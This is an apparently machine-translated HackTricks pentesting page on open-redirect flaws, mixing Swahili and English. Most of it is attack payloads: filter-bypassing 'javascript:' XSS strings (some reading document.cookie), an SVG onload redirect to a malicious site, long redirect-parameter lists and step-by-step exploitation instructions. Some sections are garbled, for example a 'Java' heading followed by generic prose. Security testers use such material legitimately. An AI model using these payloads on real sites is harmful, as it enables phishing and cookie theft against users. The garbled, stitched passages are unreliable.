hacktricks/pentesting-web/open-redirect.md
2024-02-11 02:13:58 +00:00

13 KiB

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Uelekeze kwa localhost au anwani zisizo na kikomo

{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %} url-format-bypass.md {% endcontent-ref %}

Uelekeze wazi kwa XSS

#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)

#Bypass "javascript" word filter with CRLF
java%0d%0ascript%0d%0a:alert(0)

#Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed
#This bypasses FILTER_VALIDATE_URL os PHP
javascript://%250Aalert(1)

#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0

#Others
%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
<>javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//

Kufungua Uelekezaji kwa kupakia faili za svg

Maelezo

Uelekezaji wazi ni kasoro ya usalama inayoruhusu mtumiaji kudanganywa kubofya kiungo ambacho kinawaelekeza kwenye tovuti nyingine. Katika kesi hii, tunazingatia kasoro ya uelekezaji wazi inayotokea wakati faili ya SVG inapakiwa kwenye tovuti.

Utekelezaji

  1. Kwanza, tunahitaji kupata tovuti ambayo inaruhusu kupakia faili za SVG.
  2. Tumia kivinjari cha wavuti au zana ya upimaji wa usalama kama Burp Suite kufanya uchunguzi wa tovuti hiyo.
  3. Tafuta sehemu ya tovuti ambapo faili za SVG zinapakiwa.
  4. Pakia faili ya SVG iliyoundwa na kiungo cha uelekezaji wazi. Kiungo hiki kinapaswa kuwa kama ifuatavyo:
<svg onload="location.href='http://www.malicious-website.com'"></svg>
  1. Baada ya kupakia faili ya SVG, angalia ikiwa kiungo cha uelekezaji wazi kimefanya kazi kwa kuchunguza ikiwa kuna ombi la GET kwa tovuti mbaya iliyotajwa katika kiungo.

Kuzuia

Ili kuzuia kasoro ya uelekezaji wazi, unaweza kuchukua hatua zifuatazo:

  • Thibitisha na ukague kwa uangalifu data inayopokelewa kutoka kwa mtumiaji kabla ya kuitumia kama kiungo cha uelekezaji.
  • Tumia njia za uthibitishaji wa kiungo ili kuhakikisha kuwa kiungo kinawaelekeza tu kwenye tovuti zilizoidhinishwa.
  • Tumia vikwazo vya faili na aina ya faili ili kuzuia kupakia faili hatari kama SVG.
  • Endelea kusasisha na kurekebisha programu na mifumo yako ili kuzuia kasoro za usalama zinazoweza kusababisha uelekezaji wazi.
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
</svg>
</code>

Vigezo vya kuingiza kawaida

When testing for open redirect vulnerabilities, it is important to understand common injection parameters that can be exploited. These parameters are often found in the URL or in the request body. Here are some common injection parameters to look out for:

  • url: This parameter is used to specify the target URL. Attackers can manipulate this parameter to redirect users to malicious websites.
  • redirect: This parameter is used to specify the redirect URL. Attackers can modify this parameter to redirect users to a different location.
  • next: This parameter is commonly used in login and authentication flows to redirect users after successful authentication. Attackers can abuse this parameter to redirect users to malicious sites.
  • return: Similar to the next parameter, this parameter is used to redirect users after a successful action. Attackers can exploit this parameter to redirect users to malicious destinations.
  • callback: This parameter is often used in JSONP (JSON with Padding) requests to specify a callback function. Attackers can manipulate this parameter to redirect users to malicious sites.

By understanding these common injection parameters, you can effectively test for open redirect vulnerabilities and protect your web applications from potential attacks.

/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
success=https://c1h2e1.github.io
data=https://c1h2e1.github.io
qurl=https://c1h2e1.github.io
login=https://c1h2e1.github.io
logout=https://c1h2e1.github.io
ext=https://c1h2e1.github.io
clickurl=https://c1h2e1.github.io
goto=https://c1h2e1.github.io
rit_url=https://c1h2e1.github.io
forward_url=https://c1h2e1.github.io
@https://c1h2e1.github.io
forward=https://c1h2e1.github.io
pic=https://c1h2e1.github.io
callback_url=https://c1h2e1.github.io
jump=https://c1h2e1.github.io
jump_url=https://c1h2e1.github.io
click?u=https://c1h2e1.github.io
originUrl=https://c1h2e1.github.io
origin=https://c1h2e1.github.io
Url=https://c1h2e1.github.io
desturl=https://c1h2e1.github.io
u=https://c1h2e1.github.io
page=https://c1h2e1.github.io
u1=https://c1h2e1.github.io
action=https://c1h2e1.github.io
action_url=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
sp_url=https://c1h2e1.github.io
service=https://c1h2e1.github.io
recurl=https://c1h2e1.github.io
j?url=https://c1h2e1.github.io
url=//https://c1h2e1.github.io
uri=https://c1h2e1.github.io
u=https://c1h2e1.github.io
allinurl:https://c1h2e1.github.io
q=https://c1h2e1.github.io
link=https://c1h2e1.github.io
src=https://c1h2e1.github.io
tc?src=https://c1h2e1.github.io
linkAddress=https://c1h2e1.github.io
location=https://c1h2e1.github.io
burl=https://c1h2e1.github.io
request=https://c1h2e1.github.io
backurl=https://c1h2e1.github.io
RedirectUrl=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
ReturnUrl=https://c1h2e1.github.io

Mifano ya nambari

.Net

response.redirect("~/mysafe-subdomain/login.aspx")

Java

Java ni lugha ya programu inayotumika sana kwa maendeleo ya programu za kompyuta. Inajulikana kwa usalama wake na uwezo wake wa kufanya kazi kwenye majukwaa tofauti. Hapa kuna baadhi ya mbinu za kawaida za udukuzi zinazohusiana na Java:

Open Redirect

Open Redirect ni mbinu ya udukuzi ambapo mtumiaji anaelekezwa kutoka kwenye tovuti moja hadi nyingine kupitia kiungo kilicho na udanganyifu. Hii inaweza kufanyika kwa kutumia parameter ya URL ambayo inaruhusu mtumiaji kubadilisha URL ya mwisho.

Mara nyingi, mbinu hii inaweza kutumiwa kwa njia mbalimbali za kijamii za udukuzi, kama vile kudanganya mtumiaji kubofya kiungo ambacho kinamwongoza kwenye tovuti ya udanganyifu au kudanganya mtumiaji kuingia maelezo yao ya siri kwenye tovuti ya udanganyifu.

Kwa mfano, ikiwa tovuti ina parameter ya URL inayoitwa "redirect", mtumiaji anaweza kubadilisha URL ya mwisho kwa kuongeza kiungo cha udanganyifu. Hii inaweza kusababisha mtumiaji kuwa na imani kwamba wanahamishwa kwenye tovuti halali, wakati wanapelekwa kwenye tovuti ya udanganyifu.

Kuzuia mbinu hii ya udukuzi, ni muhimu kufanya ukaguzi wa kina wa parameter za URL na kuhakikisha kuwa kiungo cha mwisho kinabaki ndani ya tovuti halali.

response.redirect("http://mysafedomain.com");

PHP

Open Redirect

Open Redirect is a vulnerability that allows an attacker to redirect users from a trusted website to a malicious website. This can be exploited by manipulating the URL parameters or user input.

Exploiting Open Redirect Vulnerabilities

To exploit an open redirect vulnerability, follow these steps:

  1. Identify the vulnerable parameter or user input that is used to construct the redirect URL.
  2. Craft a malicious URL by modifying the value of the vulnerable parameter to point to the attacker's website.
  3. Send the malicious URL to the target user, enticing them to click on it.
  4. When the user clicks on the malicious URL, they will be redirected to the attacker's website.
Example

Suppose there is a website that has an open redirect vulnerability in the redirect parameter. The vulnerable URL looks like this:

https://example.com/redirect?url=<redirect_url>

To exploit this vulnerability, an attacker can craft a malicious URL like this:

https://example.com/redirect?url=https://malicious-website.com

When the target user clicks on this URL, they will be redirected to https://malicious-website.com.

Mitigation

To mitigate open redirect vulnerabilities, follow these best practices:

  1. Validate and sanitize user input to prevent malicious URLs from being constructed.
  2. Implement a whitelist approach for redirect URLs, allowing only trusted domains.
  3. Use server-side checks to verify the validity of redirect URLs.
  4. Educate users about the risks of clicking on unknown or suspicious URLs.

By following these practices, you can reduce the risk of open redirect vulnerabilities in your PHP applications.

<?php
/* browser redirections*/
header("Location: http://mysafedomain.com");
exit;
?>

Vifaa

Vyanzo

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks: